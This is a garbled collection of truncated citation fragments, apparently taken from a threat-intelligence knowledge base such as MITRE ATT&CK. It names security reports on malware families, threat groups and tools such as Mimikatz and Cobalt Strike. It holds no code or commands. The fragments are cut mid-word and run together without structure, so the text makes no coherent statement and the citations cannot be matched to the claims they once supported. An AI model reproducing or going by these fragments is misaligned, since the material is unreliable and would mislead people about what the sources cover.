cureworks MCMD July 2019),(Citation: Trend Micro njRAT 2018),(Citation: SentinelOne Agrius 2021),(Citation: Microsoft Deep Dive Solorig
n: Google Cloud APT41 2024),(Citation: Talos Nyetya June 2017),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Talos ZxShell Oct 201
Fidelis Turbo),(Citation: Unit 42 Sofacy Feb 2018),(Citation: ESET EvilNum July 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation

SA AA20-239A BeagleBoyz August 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: Lotus Blossom Jun 2015),(Citation: Novetta Block

Web September 2021),(Citation: GitHub QuasarRAT),(Citation: TrendMicro PE_URSNIF.A2),(Citation: CISA AR21-126A FIVEHANDS May 202
tion: Kroll Royal Deep Dive February 2023),(Citation: Sophos Ragnar May 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: Drag
tion: Lumen Versa 2024),
Sept 2018),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Talos ZxShell Oct 2014),(Citation: FireEye FIN7 Oct 2019),(Citation: Elastic P
July 2018),(Citation: SCILabs Malteiro 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: group-ib_redcurl1),(Citation: M
ak),(Citation: ASERT Donot March 2018),(Citation: Secureworks Karagany July 2019),(Citation: FireEye SMOKEDHAM June 2021),(Citation:

n: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: Accentur
2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Eset Ramsay May 2020),(Citation: Bitdefender FunnyDream Campaign Nov
OVID-19 June 2020),(Citation: Talos Cobalt Group July 2018),(Citation: PWC KeyBoys Feb 2017),(Citation: ESET RTM Feb 2017),(Citation: M
August 2023),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft Prestige ransomware October 2022),(Citation: Talos Olympic De
rowdstrike HuntReport 2022),
(Citation: FireEye APT10 Sept 2018),(Citation: SentinelOne NobleBaron June 2021),(Citation: Talos Nyetya June 2017),(Citation: Trend Micr

der FunnyDream Campaign November 2020),

ation: Kaspersky Flame),
0),(Citation: Trend Micro AvosLocker Apr 2022),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Dragos Crashoverr
November 2019),(Citation: Kaspersky Carbanak),(Citation: ESET Crutch December 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citati
Bazar July 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Trusteer Carberp October 2010),(Citation: Kaspersky Ca
ecure CozyDuke),

ns),(Citation: TechNet Credential Theft),(Citation: Microsoft Securing Privileged Access),(Citation: Microsoft LSA),(Citation: TechNet Least P

2017),(Citation: Huntress NPPSPY 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: GitHub QuasarRAT),(Citati

800-63-3),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)

Globe),(Citation: Microsoft Common Conditional Access Policies),(Citation: MFA Fatigue Attacks - PortSwigger)
on: FireEye Operation Double Tap),(Citation: Telefonica Snip3 December 2021),(Citation: Chaos Stolen Backdoor),(Citation: Cybereason Baz
Saint Bot April 2021),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Bazar July 2020),(Citation: Cisco Talos Bitter Bang

erworm Sep 2020),(Citation: Mandiant FIN13 Aug 2022),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: FireEye APT41 Aug 2019),(Cita
ro Qakbot May 2020),(Citation: NCC Group Chimera January 2021),(Citation: Cisco Ukraine Wipers January 2022),(Citation: ESET Trickbot O
es McLellan March 2016),(Citation: Securelist DarkVishnya Dec 2018),(Citation: Github PowerShell Empire),(Citation: Kaspersky Regin),(Cita
Feb 2020),(Citation: FRP GitHub),(Citation: Intezer HiddenWasp Map 2019),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation
eEye FIN7 Aug 2018),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: ESET OceanLotus Mar 2019),(Citation: Bitdefender StrongPity June 2
fly 2023),(Citation: FireEye CARBANAK June 2017),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET Sednit Part 2),(Citation: TrendM

ail),(Citation: FireEye APT35 2018),(Citation: GitHub Pupy),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Symantec MuddyWater D
TIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Deply Mimikatz),(Citation: Directory Serv
ols),(Citation: GitHub LaZagne Dec 2018),(Citation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July 2019),(Citation: AADInternals
Enemy FIN8 Aug 2016),(Citation: Microsoft PLATINUM April 2016),(Citation: FireEye FIN6 Apr 2019),(Citation: Cybersecurity Advisory GRU
September 2018),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Microsoft Prestige ransomware October 2022),(Citation

pper Technical Annex April 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: McAfee Night Dragon),(Citation: CrowdS
nt January 2021),(Citation: Morphisec Snip3 May 2021),(Citation: Secureworks Karagany July 2019),(Citation: Palo Alto Unit 42 OutSteel Sa
orm April 2018),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Securelist Brazilian Banking
Unit 42 QUADAGENT July 2018),(Citation: Visa FIN6 Feb 2019),(Citation: PowerSploit Documentation),(Citation: CrowdStrike Carbon Spide
tation: PaloAlto CardinalRat Apr 2017),
andiant ROADSWEEP August 2022),(Citation: Cybereason Bazar July 2020),(Citation: Sekoia Raccoon1 2022),(Citation: Palo Alto Brute Ratel
une 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Binary Defense Emotes Wi-Fi Spreader),
Dell Sakula),(Citation: Cisco Ukraine Wipers January 2022),(Citation: ESET EvilNum July 2020),(Citation: Unit42 Emissary Panda May 2019),(
n: ESET OceanLotus Mar 2019),(Citation: Intel 471 REvil March 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: ESET Dukes October

2018),(Citation: Leonardo Turla Penquin May 2020),(Citation: Crowdstrike Qakbot October 2020),(Citation: Unit42 OilRig Nov 2018),(Citati

y 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: S2 Grupo TrickBot June 2017),(Citation: FireEye Clandestin
ntec RAINDROP January 2021),(Citation: ESET Okrum July 2019),(Citation: Talos Oblique RAT March 2021),(Citation: MalwareBytes Lazarus-

n: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: IBM MegaCortex),

U29155 2024),(Citation: Proofpoint TA2541 February 2022),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Kasp
TIC PANDA December 2021),(Citation: Kaspersky Carbanak),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: FireEye APT19),(Citation

(Citation: win10_asr)

E Github September 2018),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Microsoft Install Password Filter n.d)
tation: Kaspersky TajMahal April 2019),(Citation: Symantec Chafer Dec 2015),(Citation: HP SVCReady Jun 2022),(Citation: Sentinel Labs Wa
y SolarWinds),(Citation: FOX-IT May 2016 Mofang),(Citation: Unit 42 Siloscape Jun 2021),(Citation: CISA AA24-038A PRC Critical Infrastruct

Citation: CME Github September 2018),(Citation: Symantec Inception Framework March 2018),(Citation: Kaspersky Sodin July 2019),(Citati
October 2021),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: Trend Micro Black Basta October 2022),(Citation:
mber 2022),(Citation: Novetta-Axiom),(Citation: Microsoft Anti Spoofing),(Citation: ACSC Email Spoofing)
e Election Threats October 2020),(Citation: Microsoft Anti Spoofing),(Citation: ACSC Email Spoofing)
US-CERT TA18-074A),(Citation: StarBlizzard),(Citation: Microsoft Star Blizzard August 2022),(Citation: Microsoft Anti Spoofing),(Citation: A
tion: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Volexity Ocean Lotus November 2020),(Citation: AADInternals

Malwarebytes Saint Bot April 2021),(Citation: Talos Emotet Jan 2019),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Trend Mi
o Unit 42 OutSteel SaintBot February 2022 ),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: US-CERT Emotet Jul 2018),(Cita

ffron Rose 2013),(Citation: FireEye APT34 July 2019),(Citation: SecureWorks Mia Ash July 2017),(Citation: Microsoft Phosphorus Mar 2019)

er),(Citation: Microsoft WhisperGate January 2022),(Citation: ESET Carberp March 2012),(Citation: FinFisher Citation),(Citation: Novetta Blo

egrity Assurance - TACACS),(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
trike Ryuk January 2019),(Citation: cobaltstrike manual),(Citation: Volexity PowerDuke November 2016),(Citation: Secureworks DarkTortill
ne Feb 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: CrowdStrike Ryuk January 2019),(Citation: Symantec Wiarp May 2012),(
Gigamon BADHATCH Jul 2019),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FIN8 July 2021),(Citation: ESET InvisiM
HATCH Jul 2019),(Citation: Malwarebytes Saint Bot April 2021),(Citation: SCILabs Malteiro 2021),(Citation: TrendMicro Tropic Trooper Mar

May 2021),(Citation: ESET InvisiMole June 2020),(Citation: Sophos Gootloader),(Citation: Rapid7 Fake W2 July 2024),

Bazar July 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Microsoft Tot

: Mandiant FIN5 GrrCON Oct 2016),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Kaspersky Lyceum October 2021),(Citation: Mythc
T41),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Ca

: Mandiant FIN5 GrrCON Oct 2016),(Citation: FireEye APT10 April 2017),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: Mythc Documen
NSA/FBI Drovorub August 2020),(Citation: Check Point Pay2Key November 2020),(Citation: Symantec RAINDROP January 2021),(Citation: B
Citation: ESET Kobalos Feb 2021),(Citation: Unit 42 Siloscape Jun 2021),(Citation: FRP GitHub),(Citation: ESET Attor Oct 2019),(Citation: Sec
Dec 2015),(Citation: Microsoft PLATINUM April 2016),(Citation: Unit 42 QUADAGENT July 2018),(Citation: FireEye APT30),(Citation: Talos Ki
3),(Citation: MSTIC FoggyWeb September 2021),(Citation: CrowdStrike IceApple May 2022),(Citation: wardle evilquest partii),(Citation: Gith
Muddy Water March 2021),(Citation: Huntress INC Ransom Group August 2023),(Citation: Crowdstrike TELCO BPO Campaign December 20
on: Crowdstrike HuntReport 2022),

icrosoft Process Wide Com Keys)

t Aug 2017),(Citation: Proofpoint TA505 October 2019),(Citation: McAfee Night Dragon),(Citation: GitHub QuasarRAT),(Citation: apt41_dcs
a June 2017),(Citation: Symantec Orangeworm April 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Cylance Cleaver),(Citation: M
n: Cisco Talos Intelligence Group),(Citation: Symantec Palmerworm Sep 2020),(Citation: Mandiant FIN13 Aug 2022),(Citation: Mandiant_UN
n: Microsoft Actinium February 2022),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ClearSky Siamesekitten Augu
),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Palo Alto Brute Ratel July 2022),(Citation: cobaltstrike ma
March 2018),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN6 Ap
ersky Darkhotel),(Citation: ThreatExpert Agent.btz),(Citation: DustySky),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Mandiant S

n: ESET LoudMiner June 2019),(Citation: apt41_mandiant),(Citation: Lacework TeamTNT May 2021),(Citation: Talos Rocke August 2018),(Ci

zone Feb 2020),(Citation: ESET Ebury Oct 2017),(Citation: TrendMicro Hacking Team UEFI),(Citation: Intezer HiddenWasp Map 2019),(Citati
hNet Scheduling Priority)
on: Powersploit),(Citation: Secureworks - AT.exe Scheduled Task),(Citation: TechNet Scheduling Priority),(Citation: Kifarunix - Task Schedul

PT5 Citrix Threat Hunting December 2022),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: CheckPoint SpeakUp Feb 2019),(
re CozyDuke),(Citation: ASERT Donot March 2018),(Citation: ESET Crutch December 2020),(Citation: S2 Grupo TrickBot June 2017),(Citatio

ation: ESET ComRAT May 2020),(Citation: ESET Sednit Part 2),(Citation: PTSecurity Higaisa 2020),(Citation: ESET LightNeuron May 2019),(Ci
),(Citation: ASERT Donot March 2018),(Citation: ESET Operation Groundbait),(Citation: GitHub Sliver Screen),(Citation: Amnesty Intl. Ocean

Exploitation January 2024),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Proofpoint TA407 September 2
nda May 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Google Cloud APT

Citation: Microsoft Prestige ransomware October 2022),(Citation: NCC Group LAPSUS Apr 2022),(Citation: Proofpoint LookBack Malware A
PipeMon May 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Prevailion DarkWatchman

Profile),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Bazar July 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation
Shell Crew Feb 2017),(Citation: F-Secure CozyDuke),(Citation: ESET Operation Groundbait),(Citation: DustySky),(Citation: FireEye Know Yo

de Profile),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Talos Transparent Tribe May 2021),(Citation: Mandian

: Volexity Ocean Lotus November 2020),(Citation: ESET Lazarus Jun 2020),(Citation: McAfee Night Dragon),(Citation: Palo Alto Unit 42 Out

21),(Citation: Sekoia Raccoon2 2022),(Citation: ESET EvasivePanda 2023),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Prev

Targeting Healthcare October 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: DFIR Ryuk 2 Hour Speed Run November

itation: FireEye APT40 March 2019),(Citation: Deep Instinct Black Basta August 2022),(Citation: Cybereason Bazar July 2020),(Citation: Kas

4),(Citation: Carbon Black Shlayer Feb 2019),(Citation: Shlayer jamf gatekeeper bypass 2021),(Citation: CoinTicker 2019),(Citation: objectiv

January 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: ESET EvasivePanda 2023),(Citation: Secureworks GandCrab a

2019),(Citation: Group IB Silence Sept 2018),(Citation: Palo Alto OilRig May 2016),
),(Citation: FireEye FIN7 April 2017),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: TrendMicro Confucius APT Feb 2018),(C
on: Cybereason Clop Dec 2020),(Citation: Kaspersky Duqu 2.0),(Citation: Sophos Maze VM September 2020),(Citation: TrendMicro Raspbe

nt Bot April 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: JoeSecurity Egregor 2020),(Citation: emotet_trendmicro_mar2023),(C
Bitdefender APT28 Dec 2015),(Citation: FireEye APT19),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: DFIR_Quantum_Ran

n: GitHub QuasarRAT),(Citation: S2 Grupo TrickBot June 2017),(Citation: Check Point Warzone Feb 2020),(Citation: Bitdefender APT28 Dec
Amadey 2020),(Citation: Secureworks Gold Prelude Profile),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Ensilo Darkgate 2018),(
are),(Citation: CrowdStrike Ryuk January 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: NTT Security Flagpro new December 2021),(
warebytes Saint Bot April 2021),(Citation: Symantec Orangeworm April 2018),(Citation: Trend Micro Tick November 2019),(Citation: Cybere
January 2022),(Citation: FoxIT Wocao December 2019),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Mandiant FIN13 Aug 2

tation: Palo Alto CVE-2015-3113 July 2015),(Citation: FRP GitHub),(Citation: Group IB APT 41 June 2021),(Citation: FireEye NETWIRE March
bytes Saint Bot April 2021),(Citation: Symantec Orangeworm April 2018),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: ASER

(Citation: Intel 471 REvil March 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Symantec Orangeworm April 2018),(C

tone Sleet 2024),(Citation: ESET OceanLotus Mar 2019),(Citation: Huntress INC Ransom Group August 2023),(Citation: Google Cloud APT4
MosesStaff Nov 2021),(Citation: McAfee Shamoon December 2018),(Citation: Sophos Maze VM September 2020),(Citation: Elastic Latrode
Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Medium Metamorfo Apr 2020),(Citation: Kaspersky CactusPete Aug 2020),(Cita
nti July 2020),(Citation: ESET Gamaredon June 2020),(Citation: Cybereason Conti Jan 2021),(Citation: ESET InvisiMole June 2020),(Citation:
ary 2021),(Citation: Unit42 Sofacy Dec 2018),(Citation: Microsoft Actinium February 2022),(Citation: US-CERT TA18-074A),(Citation: ESET G
n Backdoor),(Citation: Bleeping Computer - Ryuk WoL),(Citation: Mandiant - Synful Knock),(Citation: Leonardo Turla Penquin May 2020),(Ci

rowdStrike StellarParticle January 2022),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Profero APT27 December 2020),(Citation: MSTI
ADSecurity Finding Passwords in SYSVOL),(Citation: MS14-025)

ative Security)
2),(Citation: FireEye APT35 2018),(Citation: GitHub QuasarRAT),(Citation: CIS Emotet Dec 2018),(Citation: SentinelLabs Agent Tesla Aug 202
ne Valak June 2020),(Citation: Cybereason Oceanlotus May 2017),
025),(Citation: ADSecurity Finding Passwords in SYSVOL)
mTNT Worm August 2020),(Citation: ESET Machete July 2019),(Citation: Kaspersky Adwind Feb 2016),(Citation: Anomali Rocke March 2019
osoft Azure AD Admin Consent)
Strike TTPs Dec 2017),(Citation: Mandiant FIN12 Oct 2021),(Citation: CISA GRU29155 2024),(Citation: Github PowerShell Empire),(Citation
Mimikatz Guide),(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: STIG krbtgt reset),(Citation: ADSecurity Kerberos and KRBTGT),(Citati

Cisco Talos Bitter Bangladesh May 2022),(Citation: Trend Micro Tick November 2019),(Citation: Securelist Brazilian Banking Malware July 2

sty Intl. Ocean Lotus February 2021),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: FireEye NETWIRE March 2019),(Citatio
e FIN10 June 2017),(Citation: Microsoft STRONTIUM Aug 2019),(Citation: FireEye FIN6 Apr 2019),(Citation: Cybersecurity Advisory GRU Bru
,(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Mandiant APT29 Microsoft
October 2020),(Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet)
cure Zero-Day April 2021),(Citation: Microsoft Ransomware as a Service),(Citation: IBM TA505 April 2020),(Citation: Secureworks BRONZE
Citation: ESET Crutch December 2020),(Citation: CobaltStrike Daddy May 2017),(Citation: Bitdefender StrongPity June 2020),(Citation: Nets
4),(Citation: Kaspersky TajMahal April 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Proofpoint TA505 Octobe
ersky Lyceum October 2021),(Citation: F-Secure CozyDuke),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mediu
Cobalt Kitty 2017),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Talos Frankenstein June 2019),(Citation: Malwareb
2020),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Medium S2W WhisperGate January 2022),(Citation: Morphisec Snip3 M

cture November 2022),(Citation: Google Cloud APT41 2024),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Cybere
tion: FireEye FIN7 Aug 2018),(Citation: Mandiant APT1),(Citation: ESET ComRAT May 2020),(Citation: ESET Telebots Dec 2016),(Citation: ES
ecurelist Dropping Elephant),(Citation: F-Secure The Dukes),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Securelist MiniDu

ckpoint MosesStaff Nov 2021),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Kersten Akira 2023),(Citation: Group IB APT 41
ar RAT December 2018),(Citation: Group IB Cobalt Aug 2017),(Citation: Talent-Jump Clambling February 2020),(Citation: Palo Alto Unit 42 O

y Mockingbird May 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: CrowdStrike Ryuk January 2019),(Citation: Baumgartner Naikon
los ZxShell Oct 2014),(Citation: Novetta Blockbuster Tools),(Citation: Medium KONNI Jan 2020),(Citation: McAfee Bankshot),(Citation: Micr

ber 2020),(Citation: GitHub Pupy),(Citation: FinFisher Citation),(Citation: Bitdefender FIN8 July 2021),(Citation: Microsoft FinFisher March 2

1),(Citation: ESET Telebots Dec 2016),(Citation: CME Github September 2018),(Citation: Palo Alto Brute Ratel July 2022),(Citation: NCC Gro
ell March 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: BiZone Lizar May 2021),(Citation: Trend Micro Tric
n: RATANKBA),(Citation: Accenture HyperStack October 2020),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: FireEye SMO

ampaign July 2021),(Citation: Gmail Delegation)

RT TA18-074A),(Citation: Proofpoint TA505 Jan 2019),

n: Kaspersky Winnti April 2013),(Citation: Slowik Sandworm 2021),(Citation: ESET Dukes October 2019),(Citation: Volexity Ocean Lotus No

FoxIT Wocao December 2019),

FireEye TRITON 2019),(Citation: Novetta-Axiom),

41 February 2022),(Citation: ClearSky Lazarus Aug 2020),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: TrendMic

rserk Bear December 2020),(Citation: Check Point APT35 CharmPower January 2022),(Citation: SentinelOne WinterVivern 2023),(Citation:
tion: byt3bl33d3r NTLM Relaying)
une 2020),(Citation: Symantec Daggerfly 2024),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Huntress INC Ransom Group August 2023),(
Cobalt Kitty 2017),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Kaspersky Lyceum October 2021),(Citation: Mythc Documentation)
t 42 CARROTBAT November 2018),(Citation: ESET Attor Oct 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: Kaspersky Regin),(C
t42 SilverTerrier 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Unit42 RD

mber 2020),(Citation: Infoblox Lokibot January 2019),(Citation: Unit 42 Valak July 2020),(Citation: CISA SoreFang July 2016),(Citation: NCSC
tion: Kaspersky NetTraveler),(Citation: Secureworks Karagany July 2019),(Citation: Symantec Chafer Dec 2015),(Citation: Symantec Catcha
ation: Malwarebytes Konni Aug 2021),(Citation: Trend Micro Black Basta October 2022),(Citation: Mandiant Operation Ke3chang Novemb
r Sept 2022),(Citation: ThreatExpert Agent.btz),(Citation: MSTIC FoggyWeb September 2021),(Citation: Visa RawPOS March 2015),(Citation
0),(Citation: ESET InvisiMole June 2018),(Citation: Kaspersky Turla Aug 2014),(Citation: SecureWorks BRONZE UNION June 2017),(Citation:
Ts April 2019),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: CrowdStrike StellarParticle January 2022),
EvasivePanda 2023),(Citation: Securelist ScarCruft May 2019),(Citation: ESET Attor Oct 2019),(Citation: TrendMicro DarkComet Sept 2014)
Frankenstein June 2019),(Citation: Roadtools),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: RotaJakiro 2021 netlab360 analys
ron May 2019),(Citation: ESET Attor Oct 2019),(Citation: F-Secure Cosmicduke),(Citation: Sekoia Raccoon2 2022),(Citation: ESET Sednit USB

ation: Microsoft PLATINUM April 2016),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Talos Cobalt Strike September 2020),(Ci

tion: Kernel Self Protection Project),(Citation: LKM loading kernel restrictions)

ovember 2019),(Citation: Kaspersky Sofacy),(Citation: F-Secure CozyDuke),(Citation: Secureworks Karagany July 2019),(Citation: FireEye SM

Empire),(Citation: ESET Okrum July 2019),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Unit 42 SeaDuke 2015),(Citation: Baumgartner

il 2016),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Securelist Remexi Jan 201

y 2022),(Citation: Github PowerShell Empire),(Citation: Prevailion DarkWatchman 2021),(Citation: CISA Scattered Spider Advisory Novemb
KDR_URSNIF.SM),(Citation: Dell Dridex Oct 2015),(Citation: cobaltstrike manual),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citati
nya Dec 2018),(Citation: CERT-FR PYSA April 2020),(Citation: Crowdstrike Qakbot October 2020),(Citation: GitHub PoshC2),(Citation: TrendM
Malwarebytes Pony April 2016),(Citation: US-CERT Emotet Jul 2018),(Citation: Trend Micro Xbash Sept 2018),(Citation: Mandiant APT29 Mi
155 2024),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: MSTIC Nobelium Oct 2021),(Citation: Symant

on: Cylance Cleaver),(Citation: Kaspersky TajMahal April 2019),(Citation: IBM Grandoreiro April 2020),(Citation: Talent-Jump Clambling Feb

en Versa 2024),(Citation: Proofpoint TA505 October 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandia

g 2018),(Citation: Zscaler Higaisa 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Proofpoint TA505 Sep 2017),(Citation: Sentine

021),(Citation: CME Github September 2018),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Morphisec Snip3 May 20
ng Edge Part 3 February 2024),(Citation: ESET Ebury Oct 2017),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: CERT-FR PYSA April 2020),(
d Micro MacOS Backdoor November 2020),(Citation: FireEye Periscope March 2018),(Citation: Mandiant Cutting Edge Part 3 February 202
2 KerrDown February 2019),(Citation: Morphisec Snip3 May 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Palo Alto
owerDuke November 2016),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Github AD-Pentest-Script),(Citation: FireEye HAWKBA

Microsoft 365 2022),(Citation: IBM ITG18 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: CISA AA21-200A APT40 July 2021),(C

uest partii),(Citation: reed thiefquest ransomware analysis),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: trendmicro xcs

A Operation Muzabi),(Citation: Mandiant APT43 March 2024),(Citation: McAfee Lazarus Nov 2020),(Citation: Mandiant UNC3890 Aug 2022

owdstrike Indrik November 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Leonard TAG 2023),(Citation: CISA AA24-038A PR

S Azure AD 2023),(Citation: Kubernetes Cloud Native Security)

ap 2019),(Citation: Savill 1999),(Citation: BitDefender Chafer May 2020),(Citation: Symantec Leafminer July 2018),(Citation: Symantec Dag
o Stealer May 2024),(Citation: Lookout Dark Caracal Jan 2018),(Citation: TrendMicro MacOS April 2018),(Citation: synack 2016 review),(Cit
024),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: TrendMicro MacOS April 2018),(Citation: MacKeeper Bundlore Apr 2019),(
ligence Group),
tion: Checkpoint MosesStaff Nov 2021),(Citation: ESET Sednit Part 1),(Citation: Group IB APT 41 June 2021),(Citation: US-CERT Emotet Jul 2
y 2021),(Citation: Kaspersky Lyceum October 2021),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: GitHub Quas

2019),(Citation: DustySky),(Citation: Symantec Dragonfly),(Citation: Talos Manjusaka 2022),(Citation: Visa FIN6 Feb 2019),(Citation: Kaspers

SentinelOne Valak June 2020),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cybe
t 42 Shamoon3 2018),(Citation: Medium S2W WhisperGate January 2022),(Citation: ESET Telebots June 2017),(Citation: NCC Group LAPSU

ndiant ROADSWEEP August 2022),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: ESET InvisiMole June 2020),(Citation: J
UM April 2016),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Trend Micro IXESHE 2012),(Citation: Security Intelligence More Eggs Au
021),(Citation: wardle evilquest partii),(Citation: Kersten Akira 2023),(Citation: Unit42 Clop April 2021),(Citation: CrowdStrike Ryuk January

ber 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),
ation: Group IB GrimAgent July 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: FireEye SUNBURST Backdoor December 202
29A Snake Malware May 2023),(Citation: Kaspersky ToddyCat June 2022),(Citation: Novetta Blockbuster),(Citation: Cobalt Strike Manual 4.
mber 2020),(Citation: GitHub Sliver HTTP),(Citation: Symantec Sunburst Sending Data January 2021),(Citation: Novetta-Axiom),(Citation: ES
ation: Kaspersky Lyceum October 2021),
(Citation: Symantec Calisto July 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Mandiant UNC3313 Feb 2022),(Citati
WC Cloud Hopper April 2017),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Cybersecurity Advisory GRU Brute Force
que RAT March 2021),(Citation: cobaltstrike manual),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Ros
19),(Citation: Google Cloud Encryption Key Rotation)

on: TrustedSec OOB Communications)

2012),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Huntress NPPSPY 2022),(C
